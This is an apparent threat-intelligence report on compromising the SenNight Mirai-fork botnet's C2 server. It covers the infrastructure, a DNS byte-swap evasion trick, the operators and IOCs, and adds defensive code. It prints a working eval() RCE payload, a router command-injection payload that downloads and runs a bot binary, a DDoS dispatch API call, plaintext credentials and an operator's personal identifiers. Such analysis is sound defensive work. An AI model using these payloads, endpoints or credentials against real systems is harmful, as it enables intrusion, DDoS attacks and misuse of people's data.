high 🤖 Botnet
Investigated: March 5, 2026 | Published: March 5, 2026

SenNight Unmasked: Full Server Compromise of a Mirai-Fork Botnet Reveals DNS Byte-Swap Anti-Analysis, Operator Succession Chain, and 30Gbps DDoS Infrastructure

Tags: #botnet #c2 #exploit #iot #reverse-engineering

Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence

TL;DR

An eval() injection in a Flask-based DDoS panel gave us root-level RCE on the SenNight botnet's primary C2 server, yielding 850KB+ of exfiltrated source code, credentials, databases, and operational logs. The operator -- a Chinese-speaking actor using the handle angelalk21 (QQ: 597118859, Telegram: @Kuru_x86) -- runs a Mirai-fork botnet with a novel DNS byte-swap anti-analysis technique that causes passive DNS researchers to track decoy IPs in Japan and the US while the real C2 sits in Germany. The infrastructure spans three servers across Germany, the Netherlands, and Hong Kong with 30Gbps DNS amplification capacity, and has passed through at least three operators since December 2024.


The Entry Point: Python's eval() Strikes Again

The SenNight botnet (森狞僵尸网络 -- "Forest Fierce Zombie Network") ran a Flask-based attack panel on port 5000. The panel's POST /attack endpoint redirects to /?result={dict}, where the result query parameter is fed directly into Python's eval():

# panel.py line 179
result=eval(result) if result else None  # "简易反序列化" (simple deserialization)

The developer's comment -- "simple deserialization" -- understates the problem. The auth check gates the POST, but the GET parameter runs unauthenticated. Exploitation was trivial:

GET /?result={'s':True,'m':__import__('os').popen('id').read()}

Response: uid=0(root) gid=0(root) groups=0(root)

Time-based confirmation ruled out false positives: sleep(3) yielded 3.192s (baseline 0.191s), sleep(5) yielded 5.213s. We had root on the C2.

Before finding this vulnerability, we had burned through 477+ Flask session cookie forgeries (53 secret keys x 9 payloads), 42 IP whitelist bypass headers, HTTP request smuggling variants, Werkzeug debug PIN brute-force, 93 username timing enumerations on port 1337, 400+ credential combinations across multiple ports, and 57 Mirai default credentials. The eval() was hiding in plain sight.

Data exfiltration used the Apache webroot on port 80 -- write command output to /var/www/html/, retrieve via HTTP GET.
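The pattern above, an eval() over an attacker-controlled query string used as "deserialization", is worth seeing beside a hardened form. The following is an added example written for this write-up, not code from the SenNight panel: the unsafe one-liner is reproduced as parse_result_unsafe, and parse_result_safe replaces it with ast.literal_eval plus shape validation. The function names, the ALLOWED_KEYS set and the benign sample value are assumptions; the hostile sample is the payload quoted earlier, used here only as an input the safe parser must reject.

```python
"""Added example (not SenNight's panel.py): eval()-based 'deserialization'
of a URL parameter beside a hardened replacement."""
import ast

# Constructed sample values for the `result` query parameter.
BENIGN_RESULT = "{'s': True, 'm': 'attack queued'}"
# The exploit payload quoted in the write-up, shown only as input to reject.
HOSTILE_RESULT = "{'s':True,'m':__import__('os').popen('id').read()}"

# Assumption: the panel only ever sets these two keys (status flag, message).
ALLOWED_KEYS = {"s", "m"}


def parse_result_unsafe(result):
    """Mirrors panel.py line 179: eval() runs arbitrary Python from the URL,
    and the GET path is reached without the POST auth check."""
    return eval(result) if result else None  # do not use; kept for contrast


def parse_result_safe(result):
    """Hardened form.

    ast.literal_eval only accepts Python literals (dicts, lists, strings,
    numbers, booleans, None). A call such as __import__('os') is not a
    literal, so it raises ValueError instead of executing. The shape check
    then guarantees the template receives only the fields it expects.
    """
    if not result:
        return None
    try:
        value = ast.literal_eval(result)
    except (ValueError, SyntaxError):
        return None
    if not isinstance(value, dict) or not set(value) <= ALLOWED_KEYS:
        return None
    if "s" not in value or not isinstance(value["s"], bool):
        return None
    if not isinstance(value.get("m", ""), str):
        return None
    return value


if __name__ == "__main__":
    print("benign  ->", parse_result_safe(BENIGN_RESULT))
    print("hostile ->", parse_result_safe(HOSTILE_RESULT))
```

literal_eval is shown because it is a drop-in for the panel's existing dict-literal format; a cleaner redesign would pass the status through the session or a JSON round-trip (json.dumps on redirect, json.loads on render) and never evaluate the query string at all.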


Infrastructure Anatomy

Three-Server Architecture

The SenNight operation runs across three geographically distributed servers with distinct roles:

Server | Location | Role | Ports | Status (Mar 7)
--- | --- | --- | --- | ---
94.26.106.137 | DE (dataforest GmbH / vmheaven.io) | Primary CNC, bridge, bot C2, panel | 22, 80, 1337, 2323, 5000, 23004, 48101 | OFFLINE
185.198.234.96 | NL (moula-world-llc) | Backend API, Flask panel mirror, bot listeners | 22, 2222, 5000, 5555, 8001, 8080, 8085, 8443 | LIVE
103.43.8.226 | HK (I LAYER LIMITED) | DNS amplification DDoS API | 8088 | LIVE

The primary C2 hosted the operator-facing CNC console (port 1337) with a bilingual Chinese/English interface, a bot authentication bridge (port 2323) compiled from swap.c with libssh, the vulnerable Flask panel, and the actual bot command channel on port 23004. A Go-based SSH forwarder on port 48101 used ML-KEM-768 post-quantum key exchange for encrypted C2 tunneling.

The backend at 185.198.234.96 runs a Go HTTP server on port 8085 serving attack dispatch via a single GET endpoint:

GET /api/attack?username=asd30&password=asd300&target=<IP>&method=<method>&port=<port>&time=<seconds>&len=<size>

Available methods: stomp, udp, tcpack, junk, greip (standard tier); vse, icmp (gated behind higher privileges). User enumeration confirmed accounts admin, asd30, and asd50.

The DDoS API at 103.43.8.226:8088 provides the real firepower: three dedicated 10Gbps servers ("独立10G口" -- dedicated 10G ports) running DNS amplification attacks, with a 100-slot queue and 3 concurrent attack capacity. Two of three servers were online at time of investigation, giving 20Gbps active capacity.

The Hosting Stack

The primary C2's hosting chain is notable: AS48452 (traffic broadband communications ltd., Bulgaria) / AS215607 (dataforest GmbH, Frankfurt), with the VM provided by vmheaven.io -- a brand of 1337 Services LLC, registered in Saint Kitts and Nevis. The same entity operates mirailovers.io, which hosts the cross-compiler archive that angela used to build bot binaries for 13 architectures. The sister entity x1337.cc (1337 Services GmbH / X1337 CC Group AB, Sweden) openly sells "Spoofed Dedicated Servers" with IP spoofing for DDoS amplification.


The DNS Byte-Swap: A Novel Anti-Analysis Technique

This is the most technically interesting finding. All bot C2 domains resolve to byte-swapped IP addresses. The bot binary's resolve.c contains a custom XOR swap that reverses octets 0 and 2, then 1 and 3, after DNS resolution:

// resolve.c lines 338-345
tmp_buf[0] = name[0] ^ name[2];
tmp_buf[2] = name[2] ^ tmp_buf[0];
tmp_buf[0] = tmp_buf[0] ^ tmp_buf[2];
//you are blacker than you are gay
tmp_buf[1] = name[1] ^ name[3];
tmp_buf[3] = name[3] ^ tmp_buf[1];
tmp_buf[1] = tmp_buf[1] ^ tmp_buf[3];

The comment between the swap operations is the developer's original (left verbatim for forensic completeness).

The effect:

Domain | DNS Returns | Bot Connects To | Decoy Owner
--- | --- | --- | ---
hikivision.osfc.org.cn | 106.137.94.26 | 94.26.106.137 (real C2) | KDDI, Japan
angelawashere.duckdns.org | 106.137.94.26 | 94.26.106.137 (real C2) | KDDI, Japan
totolink.osfc.org.cn | 38.87.212.135 | 212.135.38.87 (real staging) | Cogent, US
realtek.osfc.org.cn | 106.137.94.26 | 94.26.106.137 (real C2) | KDDI, Japan

Any analyst doing passive DNS analysis, querying VirusTotal, or running automated IOC enrichment will attribute the C2 to an innocent KDDI IP in Japan. Only dynamic analysis of the bot binary -- or reading the source code, as we did -- reveals the real infrastructure. This technique is simple (a four-line XOR swap) but effective against the majority of automated threat intelligence pipelines that rely on passive DNS.

The domain choices are also deliberate: hikivision (typosquat of Hikvision), totolink and realtek (IoT vendor names) all sit under .osfc.org.cn, a Chinese TLD. The angelawashere.duckdns.org fallback uses free dynamic DNS. The operator's personal domain angelas.work.gd (DNSExit) pointed directly to the real C2 without byte-swapping -- an OPSEC inconsistency.
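For enrichment pipelines that only see the decoy A records, the transform is cheap to undo. The block below is an added example for this write-up, not code from the bot or from the analysis tooling: sennight_unswap applies the same octet permutation the bot applies after resolution ([a,b,c,d] becomes [c,d,a,b]), xor_swap_literal is a line-for-line port of the resolve.c snippet used only to cross-check that reading, and enrich re-annotates a passive-DNS view. The domain-to-record map is the one from the table above; the function names are mine.

```python
"""Added example (not from the bot source or the write-up): undo the
SenNight post-resolution octet swap so passive-DNS data points at the
real C2 instead of the decoy."""
from ipaddress import IPv4Address

# Passive-DNS view as an analyst sees it (records taken from the report).
PASSIVE_DNS = {
    "hikivision.osfc.org.cn": "106.137.94.26",
    "angelawashere.duckdns.org": "106.137.94.26",
    "totolink.osfc.org.cn": "38.87.212.135",
    "realtek.osfc.org.cn": "106.137.94.26",
}


def xor_swap_literal(name: bytes) -> bytes:
    """Direct port of resolve.c lines 338-345 (the three-XOR swap idiom),
    kept only to confirm what the C code does to the four octets."""
    tmp = bytearray(4)
    tmp[0] = name[0] ^ name[2]
    tmp[2] = name[2] ^ tmp[0]      # tmp[2] == name[0]
    tmp[0] = tmp[0] ^ tmp[2]       # tmp[0] == name[2]
    tmp[1] = name[1] ^ name[3]
    tmp[3] = name[3] ^ tmp[1]      # tmp[3] == name[1]
    tmp[1] = tmp[1] ^ tmp[3]       # tmp[1] == name[3]
    return bytes(tmp)


def sennight_unswap(ip: str) -> str:
    """Map a resolved (decoy) address to the one the bot actually dials:
    swap octets 0<->2 and 1<->3. The permutation is its own inverse, so the
    same call also maps a real address back to the decoy an operator would
    publish in DNS."""
    a, b, c, d = IPv4Address(ip).packed
    return str(IPv4Address(bytes([c, d, a, b])))


def enrich(passive_dns: dict) -> dict:
    """Return {domain: (decoy_ip, real_ip)} for every observed A record."""
    return {dom: (ip, sennight_unswap(ip)) for dom, ip in passive_dns.items()}


if __name__ == "__main__":
    for dom, (decoy, real) in enrich(PASSIVE_DNS).items():
        print(f"{dom:28} DNS={decoy:15} bot connects to {real}")
```

Because the permutation is an involution, the same helper also tells a defender which decoy record to watch for if the operator later re-points the domains at a known backend address.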


The Succubus Platform: DDoS-as-a-Service

The CNC runs Succubus, a commercial Mirai management framework with features well beyond a basic Mirai fork:

  • Shop system: Credit-based purchasing for roles, concurrent attack slots, time limits, and expiry extensions
  • Multi-protocol: Mirai botnet (port 818), QBot protocol (port 181), dedicated API servers
  • Discord/Telegram integration: Webhook logging and channel monitoring (currently disabled with placeholder tokens)
  • Web dashboard: Full HTML/JS panel using the Black Dashboard template
  • Fake bot count: Configured to display 19,367--22,569 bots. The real count is ~237 live bots, with 2,721 historically enrolled IPs. A 100x inflation.
  • Target whitelist: *.gov domains blocked; DDoS stats servers 103.217.189.43 and 111.170.155.199 whitelisted
  • Custom theme: Prompt @「風止意難平」 (Traditional Chinese: "The wind stops but feelings remain unsettled"), alternate theme @airashi~# (airashi = 嵐 = storm, Japanese)

MariaDB: 8 Operators, 200 Attacks

The MariaDB instance (password: Oscar20100319 -- pattern suggests a prior operator born 2010-03-19) yielded the succubus database with full operator records:

Username | Password | Login IP | Timezone | Role
--- | --- | --- | --- | ---
root | 252100 | 154.89.0.46 | Asia/Hong_Kong | admin+reseller+vip
angela | 252100 | 127.0.0.1 | Asia/Hong_Kong | admin+reseller+vip (1M concurrent)
taizi | taizi666 | 199.48.247.167 | Asia/Hong_Kong | reseller
ss686868 | ss686868 | 171.97.52.80 | Asia/Bangkok | vip
admin2 | liesha123 | 114.24.241.146 | Asia/Taipei | reseller
hatol | hatol123 | 46.210.221.18 | Asia/Jerusalem | admin+reseller+vip
guaikadmin | guaikadmin | 220.197.230.192 | Asia/Shanghai | reseller
junzhu | junzhu123 | 103.207.69.44 | Asia/Hong_Kong | reseller
botnetadmin | 114514qQ@@ | (never logged in) | -- | admin (disabled)

All passwords stored as hex-encoded plaintext. The Asia/Hong_Kong, Asia/Bangkok, Asia/Taipei, Asia/Shanghai, and Asia/Jerusalem timezones indicate a pan-Asian customer base with at least one Middle Eastern operator.

The attacks table contained 200 recorded DDoS attacks spanning January 2025 through March 2026, targeting gaming servers (Valve Source Engine on ports 27015/27020), Chinese cloud infrastructure (Tencent, Alibaba), Vietnamese ISPs, Israeli hosting, and AWS instances.


Operator Succession: Three Hands on One Botnet

The CNC's operational logs reveal the complete ownership chain:

Period | Operator | Key Activity
--- | --- | ---
Dec 25, 2024 | Server provisioned | wtmp begins
Feb 2025 | brianshaw | Initial setup, 195 attacks, first users created
Mar--Jun 2025 | brianshaw + cold | Peak operations: 20+ users, kick wars with rienig (1,235 attacks)
Jun 2025 | xin | Takeover from brianshaw, creates admin3/rienig/blackest/kral
Jan 25, 2026 | angela takes over | First attack, creates users dopt, ye, guaika
Feb 28, 2026 | angela rebuilds | Purges old users, deploys CNC/bridge/scanner, new backend
Mar 2, 2026 | angela deploys panel | Flask panel started, universal password set to 252100
Mar 6, 2026 | angela's last session | Login from Vultr VPS 45.77.86.228, ends 13:10 UTC
Mar 6, 2026 | Server compromised | Our RCE via eval(), 3+ hours after angela's last session
Mar 7, 2026 | Primary C2 offline | All ports filtered; backend remains live

How angela Took Over

The takeover was methodical:

  1. DNS byte-swap in resolve.c -- Old bots compiled without the swap connect to the decoy IPs and die off. Only angela's recompiled bots reach the real C2. This is a cryptographic shibboleth: the swap function serves as a botnet access control mechanism.
  2. Universal password 252100 stamped on every service: SSH, CNC, bridge, MariaDB angela user.
  3. Defacement signatures in the domains configuration: angeladoesnotlikepeoplepeekingathisbin, angelabotloaded, angelawashere.duckdns.org.
  4. Deliberate sabotage of the Flask panel -- The panel sends username=as30 instead of asd30, causing all web-panel-proxied attacks to silently fail against the backend API. This breaks the service for anyone using the old interface.
  5. Attacks toggled OFF in CNC -- Why run a commercial DDoS service with attacks disabled? Because angela is rebuilding.

Threat Actor Profile: angelalk21 / 王从天降

Identity Indicators

Attribute | Value | Confidence
--- | --- | ---
Primary handle | angelalk21 | HIGH -- SSH username to backend
Chinese handle | 王从天降 (wangcongtianjiang) | HIGH -- own DNS subdomain
Meaning | "Wang descended from heaven" | Pinyin decode
QQ number | 597118859 | HIGH -- FOFA registration
QQ email | 597118859@qq.com | HIGH -- in FOFA API script
FOFA API key | 5dc4070c9dcd7eab52846d3a7922e0e4 | HIGH -- from source
Telegram | @Kuru_x86 | HIGH -- channel exists, 3 subscribers, display name "nn"
Universal password | 252100 | HIGH -- SSH, CNC, bridge, MariaDB
Language | Chinese Mandarin | HIGH -- all tools, comments, UI in zh-CN
Western alias | "kieran ellison" | LOW -- in CNC branding, likely predecessor

Geographic Attribution

IP | Provider | Assessment
--- | --- | ---
39.144.238.147 | China Mobile | REAL ORIGIN -- residential mobile, strongest geographic indicator
103.175.14.11/12 | Zero Cirrus Cloud, Shanghai | Chinese VPS hop, same /24
154.89.0.46/50 | Aisanie Data, HK / Larus | VPN/proxy
154.86.9.148 | Cloud Innovation / Larus, NL | VPN/proxy
185.23.182.161 | European VPN | VPN
45.77.86.228 | Vultr (The Constant Company) | Operator VPS

China Mobile (39.144.238.147) is a consumer/residential provider. Combined with the Shanghai cloud VPS as a hop, this places the operator in mainland China. The QQ number in the 597M range was registered approximately 2009--2010, and all tooling, comments, and UI are in Simplified Chinese.

FOFA Reconnaissance

The operator uses FOFA (fofa.info, a Chinese Shodan equivalent) for target discovery, querying by icon hash to find vulnerable IoT devices and piping results through exploit scripts. The FOFA account is registered to QQ 597118859 -- the strongest identity pivot for further attribution.


Exploit Arsenal

The C2 server contained a complete offensive toolkit spanning router exploits, DVR compromises, and mass loading infrastructure:

CVE-2026-24061 -- GNU InetUtils telnetd Auth Bypass

# cve.py -- Exploits NEW_ENVIRON telnet option
# Sends USER="-f root" to bypass authentication
# Post-exploitation: kills competing botnet "kworker_ds"

After gaining root, the exploit:

  • Stops kworker_ds systemd service
  • Removes all crontabs
  • Cleans temp directories
  • Blocks competitor IPs 204.10.161.71 and 204.10.161.82 via iptables
  • Reboots the device

Teltonika Router 0-Day

Command injection via /cgi-bin/hotspotlogin.cgi in the uamip parameter:

send=1&uamip="; cd /tmp;rm -rf *;wget http://151.243.213.58/a/sys64.mips;chmod 777 sys64.mips;./sys64.mips angela.telkonika #

Bot tag angela.telkonika identifies devices enrolled through this vector. The exploit runs with 1,000 concurrent threads.

Additional Exploit Tooling

Tool | Target | Language | Notes
--- | --- | --- | ---
mpsl.go | LBLink routers (port 8080) | Go | Active scanning against Ukrainian IPs
raisecom.py | Raisecom network equipment | Python | VPN config endpoint exploitation
qinglong.py | Qinglong automation framework | Python | PUT to /aPi/system/command-run
tvt.go | TVT DVR devices | Go | Zone files for US/GB/IL/CA/MX/TW
zte.go | ZTE routers (ports 80/8083) | Go | Router exploitation
load.go / load2.go | SSH brute-force | Go | 300K goroutines, staging via 212.135.38.87
kdvr.py | KDVR DVR devices | Python | DVR exploitation
1.py | Hikvision/DVR API | Python | Mass RCE via /aPi/system/command-run

The operator downloads country-specific IP zone files (IL, US, UK, TW, MX, CA, HK) and feeds them through zmap scanning pipelines: zmap -p 8080 -w <country>.zone | go run mpsl.go 8080.


Bot Malware: Modified Mirai with RC4 Anti-Analysis

Bot Source Code (33 files)

The complete bot source was extracted from /root/bot/. Key behaviors:

  • Connects to C2 on port 23004 via DNS resolution (with byte-swap)
  • Sends RC4-encrypted auth token + architecture + root status
  • Self-deletes binary on execution (unlink(argv[0]))
  • Ignores all 64 signals, forks to background, closes stdio
  • 7-day inactivity timeout before self-termination
  • Process killer enumerates /proc/*/maps and stdin to detect competing malware
  • #ifdef HIK variant: Hikvision-specific cleanup routines
  • #ifdef ASUS variant: skips fork for ASUS router persistence
  • Build flags: -DKILLER -DLOCKER -DFLOODS
  • 13 target architectures: armv4l, armv5l, armv6l, armv7l, i586, i686, x86_64, mips, mipsel, m68k, powerpc, sh4, sparc

Modified RC4 Encryption (enc.c)

The CNC encryption module is a heavily modified RC4 implementation designed to frustrate reverse engineering:

  • 96-byte key assembled from 6x 16-byte segments with XOR pointer obfuscation (^ 0x12345678)
  • Two dummy KSA passes with 256-byte decoy keys (designed to waste analyst time)
  • Modified PRGA: step size 17 (not standard 1), bit rotations (ROL3/ROL5/ROL2/ROL6), AES GF(2^8) MixColumns operations every 2nd byte
  • Deterministic offsets: seeded from srand(key[0] + key[last] + len)
  • Dead code injection: unused confusion loops for anti-analysis

DLR Dropper

The dropper (/root/dlr/main.c) is a minimal loader using raw syscalls with no libc dependency:

// Downloads from 212.135.38.87:80 at /bins/jew.<arch>
// Saves as "kurc", chmod 777, executes
// Status messages: "JELEAD\n" (exec), "HUHNO\n" (download complete), "YAR\n" (connect failure)
// Entry point: __start (no C runtime)

Attack Methods

The bot supports 8 DDoS methods: udp, syn, psh-ack, icmp, tcpbypass, udpbypass, ack. The panel adds stomp, tcpack, junk, greip. All methods route through the dedicated DDoS API at 103.43.8.226:8088 for DNS amplification.


Post-Compromise: Why the Primary C2 Died

On March 7, 2026 -- the day after our exploitation -- the primary C2 at 94.26.106.137 went completely dark. All ports filtered. Our assessment: hosting provider suspension, not operator response.

Evidence that angela did not detect the intrusion:

  • No SSH reconnection after 13:10 UTC on March 6 (our exploit ran at ~16:30)
  • No password changes anywhere
  • No firewall rules deployed (iptables completely empty)
  • No log clearing
  • Backend credentials asd30/asd300 remained valid and unchanged
  • All alerting (Discord, Telegram, webhooks) disabled with placeholder tokens
  • No IDS, no file integrity monitoring, no cron-based alerts

The server had 40 AlienVault OTX pulses tagging it as a malware host with an open directory. It was serving bot binaries openly via Apache on port 80 at URLs like /angela686, /angelampsl, /angelahik, /angelaarm6, /dlr.arm5, /angelash4. The hosting provider likely acted on accumulated abuse reports, not anything related to our activity.

Current State: Fragmented but Alive

The backend at 185.198.234.96 remains fully operational with all 8 ports open. The DDoS API at 103.43.8.226:8088 is live (though the API key has been rotated). But the bot domains still resolve to byte-swapped IPs of the dead primary C2:

hikivision.osfc.org.cn    → 106.137.94.26 (swaps to dead 94.26.106.137)
angelawashere.duckdns.org → 106.137.94.26
realtek.osfc.org.cn       → 106.137.94.26
totolink.osfc.org.cn      → 38.87.212.135 (swaps to dead staging)
angelas.work.gd           → NXDOMAIN

The botnet is fragmented. The ~237 live bots cannot phone home until angela updates the DNS records. The backend infrastructure is waiting for bots that will never arrive. When angela discovers the primary C2 is down, she will need to update the DNS to point to 185.198.234.96 (byte-swapped) to reconnect her fleet -- and that DNS change will be visible to anyone monitoring these domains.


MITRE ATT&CK Mapping

Tactic | ID | Technique | Implementation
--- | --- | --- | ---
Initial Access | T1190 | Exploit Public-Facing Application | CVE-2026-24061 telnetd bypass, Teltonika 0-day CGI injection, LBLink router exploit
Execution | T1059.004 | Unix Shell | Shell commands via telnet/CGI injection, raw syscall dropper
Persistence | T1053.003 | Crontab | Crontab manipulation on compromised devices
Defense Evasion | T1070.004 | File Deletion | History clearing, competitor malware removal, unlink(argv[0])
Defense Evasion | T1027 | Obfuscated Files | DNS byte-swap, modified RC4, dead code injection, dummy KSA passes
Discovery | T1046 | Network Service Discovery | zmap port scanning of country-specific IP ranges
Discovery | T1596 | Search Open Technical Databases | FOFA icon hash reconnaissance
Lateral Movement | T1021.004 | SSH | 300K-goroutine SSH brute-force loader
Collection | T1005 | Data from Local System | Device compromise for botnet enrollment
Command and Control | T1095 | Non-Application Layer Protocol | Custom CNC protocol (ports 1337/23004)
Command and Control | T1572 | Protocol Tunneling | Go SSH forwarder with ML-KEM-768 post-quantum KX
Command and Control | T1568.002 | Domain Generation / Resolution | DNS byte-swap to obfuscate real C2 IP
Impact | T1498.001 | Direct Network Flood | UDP, SYN, ACK, PSH-ACK, ICMP floods
Impact | T1498.002 | Reflection Amplification | DNS amplification via dedicated 10Gbps servers

Indicators of Compromise

Active Infrastructure

185.198.234.96        Backend API / Flask panel / Bot C2 (8 ports live)
                      Hosting: moula-world-llc, NL (via InterlIR / RCS Technologies AE)
                      Ports: 22, 2222, 5000, 5555, 8001, 8080, 8085, 8443

103.43.8.226          DDoS amplification API (port 8088)
                      Hosting: I LAYER LIMITED, HK
                      Capacity: 3x 10Gbps DNS amplification servers

Offline Infrastructure (was active)

94.26.106.137         Primary CNC (all ports filtered since Mar 7)
                      Hosting: dataforest GmbH, DE / vmheaven.io (1337 Services LLC)

212.135.38.87         DLR dropper staging (/bins/jew.<arch>)
151.243.213.58        Teltonika exploit staging (/a/sys64.mips)
107.150.0.18          SSH payload staging
213.209.143.44        TFTP payload staging
204.10.161.82         Panel template source

Operator Infrastructure

45.77.86.228          Vultr VPS (operator session)
39.144.238.147        China Mobile (operator residential IP)
103.175.14.11/12      Zero Cirrus Cloud, Shanghai (hop VPS)
154.89.0.46/50        Aisanie Data, HK / Larus (VPN/proxy)
154.86.9.148          Cloud Innovation / Larus, NL (VPN/proxy)
185.23.182.161        European VPN

Domains

hikivision.osfc.org.cn      → 106.137.94.26 (byte-swapped → 94.26.106.137)
angelawashere.duckdns.org   → 106.137.94.26 (byte-swapped → 94.26.106.137)
totolink.osfc.org.cn        → 38.87.212.135 (byte-swapped → 212.135.38.87)
realtek.osfc.org.cn         → 106.137.94.26 (byte-swapped → 94.26.106.137)
angelas.work.gd             → 94.26.106.137 (direct, NXDOMAIN as of Mar 7)
aethercraft.cc              → Not resolving (registered Feb 19 via west.cn, Chengdu)

Credentials (for detection/hunting)

Flask/Backend API:  asd30 / asd300
CNC admin:          angela / 252100
CNC users:          ye / ye123, daimao / daimao123
Bridge:             admin / 252100, liesha / liesha123, luren / luren123
SSH root:           root / 252100
MariaDB:            root / Oscar20100319
FOFA:               597118859@qq.com / key:5dc4070c9dcd7eab52846d3a7922e0e4
Flask secret:       a2f987b4c0d7e1f3e4a5b6c7d8e9f0a1b

Network Signatures

Port 1337 banner:       "username / 用户名 : "
Port 2323 banner:       "Username: "
DLR status messages:    "JELEAD\n" (exec), "HUHNO\n" (download), "YAR\n" (connect fail)
DLR download path:      /bins/jew.<arch>
Bot tag format:         angela.<exploit_name>
Teltonika payload URI:  /cgi-bin/hotspotlogin.cgi (uamip param injection)
Qinglong payload URI:   /aPi/system/command-run (PUT)
Bot C2 port:            23004

Attribution Pivots

QQ:                 597118859
Telegram:           @Kuru_x86 (channel, 3 subscribers, display name "nn")
SSH handle:         angelalk21
Chinese handle:     王从天降 (wangcongtianjiang, "Wang descended from heaven")
Origin:             Mainland China (China Mobile 39.144.238.147)
FOFA account:       597118859@qq.com

AlienVault OTX URLs (Primary C2)

http://94.26.106.137/angela686
http://94.26.106.137/angelampsl
http://94.26.106.137/angelam68k
http://94.26.106.137/angelaspc
http://94.26.106.137/angelahik
http://94.26.106.137/angelaarm6
http://94.26.106.137/angelash4
http://94.26.106.137/dlr.arm5
http://94.26.106.137/dbg

Shodan Tags (Primary C2)

{
  "ip": "94.26.106.137",
  "ports": [22, 80, 1337, 9999],
  "tags": ["open-dir", "scanner"],
  "cpes": [
    "cpe:/a:apache:http_server:2.4.58",
    "cpe:/a:openbsd:openssh:9.6p1",
    "cpe:/o:canonical:ubuntu_linux"
  ]
}

Detection Guidance

For network defenders:

  • Monitor for DNS queries to hikivision.osfc.org.cn, angelawashere.duckdns.org, totolink.osfc.org.cn, realtek.osfc.org.cn -- any device resolving these is likely infected
  • Watch for outbound connections to port 23004 (bot C2 channel)
  • The DLR dropper downloads from /bins/jew.<arch> -- this URI path is a reliable signature
  • Bot binaries self-delete but the process name may appear in /proc before cleanup

For threat intelligence teams:

  • The DNS byte-swap technique will cause false negatives in passive DNS enrichment -- if you see 106.137.94.26 associated with Mirai activity, the real C2 is 94.26.106.137
  • QQ 597118859 and Telegram @Kuru_x86 are the strongest attribution pivots
  • Monitor aethercraft.cc (registered Feb 19, 2026 via west.cn) -- likely angela's next infrastructure domain

For ISPs/hosting providers:

  • 185.198.234.96 at moula-world-llc (NL) is actively dispatching DDoS attacks
  • 103.43.8.226 at I LAYER LIMITED (HK) provides 20Gbps DNS amplification capacity
  • DuckDNS should be notified about angelawashere.duckdns.org for botnet C2 use
  • osfc.org.cn subdomains (hikivision/totolink/realtek) should be reported to the registrar (Alibaba/HiChina)
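The three network-defender checks above (the four C2 domains, outbound 23004, the /bins/jew.<arch> path) are easy to turn into a first-pass triage filter. The block below is an added example written for this post, not tooling from the investigation: it runs those checks over a handful of constructed log lines. The one-line-per-event format ("timestamp source kind detail") and the function names are assumptions; the domains, port and URI path are the indicators listed in this report.

```python
"""Added example (not from the write-up): apply the SenNight detection
guidance to constructed DNS / connection / HTTP log lines."""
import re

# Indicators from the report.
SENNIGHT_DOMAINS = {
    "hikivision.osfc.org.cn",
    "angelawashere.duckdns.org",
    "totolink.osfc.org.cn",
    "realtek.osfc.org.cn",
}
BOT_C2_PORT = 23004
DLR_PATH_RE = re.compile(r"/bins/jew\.[a-z0-9]+")

# Constructed sample lines (assumed format: "<ts> <src> <kind> <detail>").
SAMPLE_LOGS = """\
2026-03-07T10:00:01Z 192.0.2.10 dns query=hikivision.osfc.org.cn
2026-03-07T10:00:02Z 192.0.2.10 conn dst=94.26.106.137:23004 proto=tcp
2026-03-07T10:00:03Z 192.0.2.11 dns query=www.example.com
2026-03-07T10:00:04Z 192.0.2.12 http GET http://212.135.38.87/bins/jew.mips
2026-03-07T10:00:05Z 192.0.2.11 conn dst=203.0.113.5:443 proto=tcp
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<kind>\S+) (?P<detail>.*)$")


def classify(line: str):
    """Return (rule, source_ip, evidence) for a matching line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    kind, detail, src = m["kind"], m["detail"], m["src"]
    if kind == "dns":
        # Normalise the query name before comparing against the C2 list.
        qname = detail.partition("query=")[2].strip().lower().rstrip(".")
        if qname in SENNIGHT_DOMAINS:
            return ("sennight-c2-domain", src, qname)
    elif kind == "conn":
        dst = detail.partition("dst=")[2].split()[0]
        _host, _, port = dst.rpartition(":")
        if port.isdigit() and int(port) == BOT_C2_PORT:
            return ("bot-c2-port", src, dst)
    elif kind == "http":
        hit = DLR_PATH_RE.search(detail)
        if hit:
            return ("dlr-dropper-uri", src, hit.group(0))
    return None


def triage(log_text: str) -> list:
    """Run classify() over every line and keep only the hits, in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for rule, src, evidence in triage(SAMPLE_LOGS):
        print(f"{rule:20} {src:12} {evidence}")
```

The domain check is the highest-confidence of the three (a resolution attempt is a direct sign of an infected device), the port check is a corroborating signal that should be paired with the destination IP, and the URI check catches the dropper stage regardless of which exploit delivered it.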

Investigation conducted March 6--8, 2026. Monitoring ongoing. Updates will be published if angela reconnects or rebuilds.
